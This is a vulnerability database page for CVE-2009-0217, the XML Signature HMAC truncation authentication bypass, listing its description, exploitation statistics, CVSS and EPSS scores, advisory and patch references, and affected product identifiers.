Vulnerability Details : CVE-2009-0217
The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits.
Threat overview for CVE-2009-0217
Top countries where our scanners detected CVE-2009-0217
Top open port discovered on systems with this issue
9080
IPs affected by CVE-2009-0217 1,613
Threat actors abusing to this issue?
Yes
Find out if you* are
affected by CVE-2009-0217!
*Directly or indirectly through your vendors, service providers and 3rd parties.
Powered by
attack surface intelligence
from SecurityScorecard.
Exploit prediction scoring system (EPSS) score for CVE-2009-0217
Probability of exploitation activity in the next 30 days: 97.28%
Percentile, the proportion of vulnerabilities that are scored at or less: ~ 100 % EPSS Score History EPSS FAQ
CVSS scores for CVE-2009-0217
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source |
---|---|---|---|---|---|
5.0
|
MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N |
10.0
|
2.9
|
NIST |
References for CVE-2009-0217
-
http://www.securitytracker.com/id?1022661
-
http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html
[security-announce] SUSE Security Announcement: OpenOffice.org (SUSE-SA:
-
http://www.securityfocus.com/bid/35671
Patch
-
http://www.vupen.com/english/advisories/2009/1908
Patch;Vendor Advisory
-
https://bugzilla.redhat.com/show_bug.cgi?id=511915
511915 – (CVE-2009-0217) CVE-2009-0217 xmlsec1, mono, xml-security-c, xml-security-1.3.0-1jpp.ep1.*: XMLDsig HMAC-based signatures spoofing and authentication bypass
-
https://issues.apache.org/bugzilla/show_bug.cgi?id=47527
47527 – XML signature HMAC truncation authentication bypass
-
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7158
-
http://www.vupen.com/english/advisories/2010/0635
Webmail | OVH- OVH
-
http://git.gnome.org/cgit/xmlsec/commit/?id=34b349675af9f72eb822837a8772cc1ead7115c7
- http://www.securitytracker.com/id?1022567
-
http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html
Page not found | Oracle
-
http://marc.info/?l=bugtraq&m=125787273209737&w=2
'[security bulletin] HPSBUX02476 SSRT090250 rev.1 - HP-UX Running Java, Remote Increase in Privilege,' - MARC
-
http://blogs.sun.com/security/entry/cert_vulnerability_note_vu_466161
-
http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023723&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere
Patch;Vendor Advisory
-
http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21384925
Patch;Vendor Advisory
- https://rhn.redhat.com/errata/RHSA-2009-1650.html
- https://rhn.redhat.com/errata/RHSA-2009-1637.html
-
http://www.kb.cert.org/vuls/id/466161
US Government Resource
- http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html
- http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1
-
https://rhn.redhat.com/errata/RHSA-2009-1649.html
RHSA-2009:1649 - Security Advisory - Red Hat Customer Portal
-
http://www.vupen.com/english/advisories/2009/2543
Webmail: access your OVH emails on ovhcloud.com | OVHcloud
-
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
Oracle Critical Patch Update - October 2010
-
http://www.mandriva.com/security/advisories?name=MDVSA-2009:209
Page not found - Mandriva.com
-
http://www.vupen.com/english/advisories/2010/0366
Webmail : Solution de messagerie professionnelle - OVHcloud- OVH
-
http://www.vupen.com/english/advisories/2009/1909
Patch;Vendor Advisory
-
http://www.us-cert.gov/cas/techalerts/TA10-159B.html
Microsoft Updates for Multiple Vulnerabilities | CISAUS Government Resource
-
http://svn.apache.org/viewvc?revision=794013&view=revision
- https://usn.ubuntu.com/826-1/
-
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10186
-
http://www.mono-project.com/Vulnerabilities
Vulnerabilities | MonoVendor Advisory
-
http://www.kb.cert.org/vuls/id/MAPG-7TSKXQ
- http://www.securitytracker.com/id?1022561
-
http://www.vupen.com/english/advisories/2009/3122
-
http://www.kb.cert.org/vuls/id/WDON-7TY529
-
http://www.us-cert.gov/cas/techalerts/TA09-294A.html
Oracle Updates for Multiple Vulnerabilities | CISAUS Government Resource
-
http://www.aleksey.com/xmlsec/
- http://www.redhat.com/support/errata/RHSA-2009-1694.html
-
http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html
Page not found | Oracle
-
http://www.openoffice.org/security/cves/CVE-2009-0217.html
-
http://www.vupen.com/english/advisories/2009/1911
Patch;Vendor Advisory
-
https://issues.apache.org/bugzilla/show_bug.cgi?id=47526
47526 – XML signature HMAC truncation authentication bypass
-
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8717
-
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html
[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-20.b16.fc10
-
http://www.w3.org/QA/2009/07/hmac_truncation_in_xml_signatu.html
Vendor Advisory
-
http://www.ubuntu.com/usn/USN-903-1
USN-903-1: OpenOffice.org vulnerabilities | Ubuntu security notices
-
http://www.vupen.com/english/advisories/2009/1900
Webmail: access your OVH emails on ovhcloud.com | OVHcloudPatch;Vendor Advisory
-
http://sunsolve.sun.com/search/document.do?assetkey=1-66-269208-1
-
https://rhn.redhat.com/errata/RHSA-2009-1201.html
RHSA-2009:1201 - Security Advisory - Red Hat Customer Portal
-
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00505.html
[SECURITY] Fedora 11 Update: xmlsec1-1.2.12-1.fc11
-
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-041
Microsoft Security Bulletin MS10-041 - Important | Microsoft Learn
-
http://www.w3.org/2008/06/xmldsigcore-errata.html#e03
Vendor Advisory
-
http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023545&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere
Patch;Vendor Advisory
-
http://git.gnome.org/cgit/xmlsec/patch/?id=34b349675af9f72eb822837a8772cc1ead7115c7
-
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html
[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-27.b16.fc11
-
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00494.html
[SECURITY] Fedora 10 Update: xmlsec1-1.2.12-1.fc10
-
http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html
[security-announce] SUSE Security Announcement: IBM Java 6 (SUSE-SA:2009:053) - openSUSE Security Announce - openSUSE Mailing Lists
-
http://www.debian.org/security/2010/dsa-1995
Debian -- Security Information -- DSA-1995-1 openoffice.org
-
https://rhn.redhat.com/errata/RHSA-2009-1200.html
RHSA-2009:1200 - Security Advisory - Red Hat Customer Portal
- https://rhn.redhat.com/errata/RHSA-2009-1636.html
-
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1020710.1-1
-
http://sunsolve.sun.com/search/document.do?assetkey=1-66-263429-1
-
https://rhn.redhat.com/errata/RHSA-2009-1428.html
RHSA-2009:1428 - Security Advisory - Red Hat Customer Portal
-
http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml
OpenOffice, LibreOffice: Multiple vulnerabilities (GLSA 201408-19) — Gentoo security
Products affected by CVE-2009-0217
- cpe:2.3:a:ibm:websphere_application_server:6.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.22:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2:*:fp17:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.24:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.25:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.10:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.14:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.8:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.16:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.18:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.32:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.30:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.31:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.22:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.28:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.29:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.20:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.10:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.14:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.16:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.33:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.18:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.20:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.3.4:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.4.3im:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:10.0:mp1:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.1:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.2:mp3:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:8.1:sp6:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:10.3:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:8.1:sp6:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.1:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.2:mp3:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:10.0:mp1:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:10.3:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.5:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.6:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.9:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.4:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:2.0:*:*:*:*:*:*:*